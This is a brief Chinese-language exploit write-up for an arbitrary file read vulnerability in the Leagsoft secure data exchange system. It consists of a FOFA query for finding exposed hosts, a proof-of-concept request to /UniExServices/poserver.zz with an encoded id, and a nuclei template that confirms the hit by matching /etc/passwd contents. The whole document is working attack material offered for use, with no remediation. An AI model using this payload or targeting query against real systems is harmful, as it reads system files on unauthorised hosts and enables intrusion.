联软安全数据交换系统任意文件读取
联软安全数据交换系统任意文件读取
fofa
body="UniExServices"
poc
/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI=
nuclei
id: leagsoft-safedata-exchange-file-fileread
info:
name: 联软安全数据交换系统任意文件读取
author: mmy
severity: high
tags: leagsoft,fileread
description: 联软安全数据交换系统任意文件读取
reference:
-
metadata:
fofa-query: 'body="UniExServices"'
verified: true
max-request: 1
http:
- method: GET
path:
- "{{RootURL}}/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI="
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0:"